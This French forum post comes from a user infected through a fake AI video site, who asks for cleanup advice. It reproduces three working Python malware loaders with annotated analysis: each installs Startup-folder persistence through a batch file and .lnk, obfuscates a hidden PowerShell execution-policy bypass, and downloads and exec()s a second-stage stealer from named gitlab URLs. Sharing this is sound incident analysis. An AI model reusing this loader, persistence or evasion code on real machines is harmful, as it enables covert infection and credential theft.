J'ai enquêté dessus et je vous partage tout pour avoir votre avis sur ce qu'il me reste à faire, et peut-être signaler à des organismes de surveillance de nouveaux virus (puisqu'il n'a été détecté nulle part).
1) La source : le site hxxps://klings-ai.com/ (!!! Ce site est donc malveillant !!!)
-> J'ai voulu tester la fonctionnalité « image to video by AI » et ça m'a fait télécharger un .zip contenant un fichier « .mp4 .exe » avec le visuel d'un fichier vidéo classique (et l'extension .exe non visible).
-> J'ai extrait le zip puis lancé le fichier quand j'ai vu qu'il s'agissait d'un mp4, avant que mon cerveau réalise la c0nnerie monumentale...
VirusTotal -> https://www.virustotal.com/gui/file/2e5 ... 373cab808a
2) Le fichier a lancé un CMD et fermé mon navigateur. J'ai éteint le PC (au cas où ça soit un ransomware ou autre process continu).
3) J'ai redémarré en mode réparation, et j'ai retrouvé le virus en ligne de commande, grâce à un .lnk placé dans le répertoire des applications de démarrage. J'ai déplacé le .lnk et le dossier du virus, et tenté de comprendre son action.
4) Redémarrage de Windows et scan avec RogueKiller et Defender -> RAS (même les fichiers du virus sont considérés comme clean)
5) Enquête:
C:\Users\MOI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Window Explorer.lnk -> lance C:\WinExplorer\WindowSecurity.bat
Qui contient
explorer | powershell -ep bypass -w hidden -c C:\WinExplorer\python.exe C:\WinExplorer\vcruntime140.py
Le code python fait appel à un "stealer", mais est obfusqué.
Le code contient du texte en Vietnamien et contient une sorte de poème en chinois insultant les chinois et en faveur des Vietnamiens.
Le code du fichier vcruntime140.py est le suivant:
#import for stealer
# --- Analysis notes (defender's reading of this file) ---
# This listing is the persistence + loader stage, not the stealer itself. It
#   1. writes C:\WinExplorer\WindowSecurity.bat (the batch line held in `code`),
#   2. writes "Window Explorer.lnk" into the user's Startup folder so that batch
#      runs again at every logon,
#   3. downloads a second stage from `url` and exec()s it inside this process.
# Most of the imports below (sqlite3, websocket, pyasn1, Crypto, win32crypt, ...)
# are never used in this listing; they pre-load what the fetched stage expects.
import os, json, base64, sqlite3, shutil, requests, glob, re, zipfile, io, datetime, hmac, subprocess
from websocket import create_connection
from base64 import b64decode
from hashlib import sha1, pbkdf2_hmac
from pathlib import Path
from pyasn1.codec.der.decoder import decode
from Crypto.Cipher import AES, DES3
from win32crypt import CryptUnprotectData
from ctypes import windll, byref, create_unicode_buffer, pointer, WINFUNCTYPE
from ctypes.wintypes import DWORD, WCHAR, UINT
#
# other import
#
# Windows Restart Manager (Rstrtmgr.dll) constants and a no-op progress callback.
# Nothing in this listing calls into the DLL; it is only loaded here, presumably
# for the second stage (Restart Manager is commonly used to unlock files held
# open by another process — unconfirmed from this file alone).
ERROR_SUCCESS = 0
ERROR_MORE_DATA = 234
RmForceShutdown = 1
@WINFUNCTYPE(None, UINT)
def callback(percent_complete: UINT) -> None:
pass
rstrtmgr = windll.LoadLibrary("Rstrtmgr")
import urllib.request
# IoC: second-stage URL. The body fetched from here is run with exec() below, so
# the stealer logic itself never has to be on disk in this file.
url = "https://gitlab.com/akedi/xmeta/-/raw/main/stealobf"
# Persistence locations. Everything in
# %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup runs at logon, and
# C:\WinExplorer\ is the malware's install directory. Both are the artifacts to
# look for and remove when cleaning the machine.
startup_folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startup_path_bat = os.path.join("C:\\WinExplorer\\", 'WindowSecurity.bat')
rie_startup_path = os.path.join(startup_folder, "Window Explorer.lnk")
# Batch content. Once the embedded quote splits (po"wers"hell, byp"as"s, ...) are
# removed by command-line parsing this is the plain
#   explorer | powershell -ep bypass -w hidden -c C:\WinExplorer\python.exe C:\WinExplorer\vcruntime140.py
# that was found in WindowSecurity.bat; the splitting is presumably meant to
# defeat naive keyword matching. -ep bypass disables the execution policy and
# -w hidden keeps the PowerShell window off screen.
code = '''explorer | po"wers"hell -ep byp"as"s -w hi"dd"en -c C:\\W"inExp"lorer\\py"tho"n.exe C:\\WinE"xplorer\\vcrun"time140.py'''
# Base64 of the Startup shortcut, decoded and written as binary below. The value
# is elided in this paste; the Gimport.dat listing carries it in full.
b64data = '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'
# Persistence is written BEFORE the payload fetch, so it is in place even when
# the download fails.
open(startup_path_bat, 'w').write(code)
open(rie_startup_path, 'wb').write(base64.b64decode(b64data))
# Remote code execution. The bare except swallows every error (no network, URL
# taken down, ...), so a failed fetch is silent and simply retried at next logon
# via the .lnk.
try:
exec(urllib.request.urlopen(url).read())
except:
pass
vcruntime140d.py contient :
#import for stealer
# --- Analysis notes (defender's reading of this file) ---
# Same loader template as vcruntime140.py; the only difference is the
# second-stage URL (xwo.loadpy instead of stealobf). Everything else — the
# batch file, the Startup .lnk and the exec() of the downloaded body — is
# identical, so cleaning up the artifacts once covers both files.
# Most of the imports below are unused here; they pre-load what the fetched
# stage expects.
import os, json, base64, sqlite3, shutil, requests, glob, re, zipfile, io, datetime, hmac, subprocess
from websocket import create_connection
from base64 import b64decode
from hashlib import sha1, pbkdf2_hmac
from pathlib import Path
from pyasn1.codec.der.decoder import decode
from Crypto.Cipher import AES, DES3
from win32crypt import CryptUnprotectData
from ctypes import windll, byref, create_unicode_buffer, pointer, WINFUNCTYPE
from ctypes.wintypes import DWORD, WCHAR, UINT
#
# other import
#
# Restart Manager (Rstrtmgr.dll) constants and a no-op progress callback; the
# DLL is loaded but nothing in this listing calls it.
ERROR_SUCCESS = 0
ERROR_MORE_DATA = 234
RmForceShutdown = 1
@WINFUNCTYPE(None, UINT)
def callback(percent_complete: UINT) -> None:
pass
rstrtmgr = windll.LoadLibrary("Rstrtmgr")
import urllib.request
# IoC: second-stage URL, fetched and exec()ed below.
url = "https://gitlab.com/akedi/xmeta/-/raw/main/xwo.loadpy"
# Persistence locations (Startup folder + C:\WinExplorer\); these are the
# artifacts to remove.
startup_folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startup_path_bat = os.path.join("C:\\WinExplorer\\", 'WindowSecurity.bat')
rie_startup_path = os.path.join(startup_folder, "Window Explorer.lnk")
# Batch content with quote-split keywords (see the vcruntime140.py notes).
# Note that the batch written by THIS file still points at vcruntime140.py, not
# at vcruntime140d.py — only the first file is re-launched at logon.
code = '''explorer | po"wers"hell -ep byp"as"s -w hi"dd"en -c C:\\W"inExp"lorer\\py"tho"n.exe C:\\WinE"xplorer\\vcrun"time140.py'''
# Base64 of the Startup shortcut (elided in this paste; see the Gimport.dat
# listing for the full value).
b64data = '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'
# Persistence first, payload second: the .bat and .lnk exist even if the
# download below fails.
open(startup_path_bat, 'w').write(code)
open(rie_startup_path, 'wb').write(base64.b64decode(b64data))
# Remote code execution; any error is swallowed silently.
try:
exec(urllib.request.urlopen(url).read())
except:
pass
On remarque que l'exe fait appel à https://gitlab.com/akedi/depvol/-/raw/main/2.ps1, qui fait exactement ce que j'ai retrouvé sur mon PC :
- Téléchargement et création d'un zip WinHelper.zip, qui est décompressé et contient l'environnement Python (source du zip : https://www.dropbox.com/scl/fi/0dmlttqj ... 6hj53&dl=1)
- exec des fichiers vcruntime140.py et vcruntime140d.py
Contenu de Gimport.dat :
#import for stealer
# --- Analysis notes (defender's reading of this file) ---
# Gimport.dat is the template the two vcruntime140*.py files were generated
# from: the code is identical except that `url` is still the placeholder
# "%up%" (presumably substituted by the PowerShell stage, 2.ps1, before the
# .py files are written — not verifiable from this listing) and the Startup
# shortcut is carried in full.
# Most of the imports below are unused in this file; they pre-load what the
# downloaded stage expects.
import os, json, base64, sqlite3, shutil, requests, glob, re, zipfile, io, datetime, hmac, subprocess
from websocket import create_connection
from base64 import b64decode
from hashlib import sha1, pbkdf2_hmac
from pathlib import Path
from pyasn1.codec.der.decoder import decode
from Crypto.Cipher import AES, DES3
from win32crypt import CryptUnprotectData
from ctypes import windll, byref, create_unicode_buffer, pointer, WINFUNCTYPE
from ctypes.wintypes import DWORD, WCHAR, UINT
#
# other import
#
# Restart Manager (Rstrtmgr.dll) constants and a no-op progress callback; the
# DLL is loaded but nothing in this listing calls it.
ERROR_SUCCESS = 0
ERROR_MORE_DATA = 234
RmForceShutdown = 1
@WINFUNCTYPE(None, UINT)
def callback(percent_complete: UINT) -> None:
pass
rstrtmgr = windll.LoadLibrary("Rstrtmgr")
import urllib.request
# Template placeholder for the second-stage URL (filled in per generated file:
# .../stealobf and .../xwo.loadpy in the two dropped scripts).
url = "%up%"
# Persistence locations: the user's Startup folder and C:\WinExplorer\. Both
# are the artifacts to look for and remove.
startup_folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startup_path_bat = os.path.join("C:\\WinExplorer\\", 'WindowSecurity.bat')
rie_startup_path = os.path.join(startup_folder, "Window Explorer.lnk")
# Batch content with quote-split keywords; once the quotes are removed by
# command-line parsing it is the plain
#   explorer | powershell -ep bypass -w hidden -c C:\WinExplorer\python.exe C:\WinExplorer\vcruntime140.py
# found in WindowSecurity.bat. The splitting is presumably meant to defeat
# naive keyword matching.
code = '''explorer | po"wers"hell -ep byp"as"s -w hi"dd"en -c C:\\W"inExp"lorer\\py"tho"n.exe C:\\WinE"xplorer\\vcrun"time140.py'''
# The `b64data` literal that follows is the full Startup shortcut. Its first
# bytes (4C 00 00 00 followed by CLSID 00021401-0000-0000-C000-000000000046)
# are the Shell Link (.lnk) header, and the ASCII path
# C:\WinExplorer\WindowSecurity.bat is embedded in it, i.e. a shortcut whose
# target is the batch file. In this forum paste the literal is wrapped onto a
# second line, so the listing as shown does not parse; the original is one line.
b64data = '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'
# Persistence is written BEFORE the payload fetch: the .bat and the Startup
# .lnk exist even when the download below fails.
open(startup_path_bat, 'w').write(code)
open(rie_startup_path, 'wb').write(base64.b64decode(b64data))
# Remote code execution of whatever `url` serves. The bare except swallows
# every error silently; a failed fetch is simply retried at the next logon
# through the .lnk.
try:
exec(urllib.request.urlopen(url).read())
except:
pass
Et que me conseillez-vous de faire à présent:
- pour m'assurer que le PC n'est plus corrompu
- pour réduire l'impact des données éventuellement volées (mots de passe ? quoi d'autre ?)
Merci!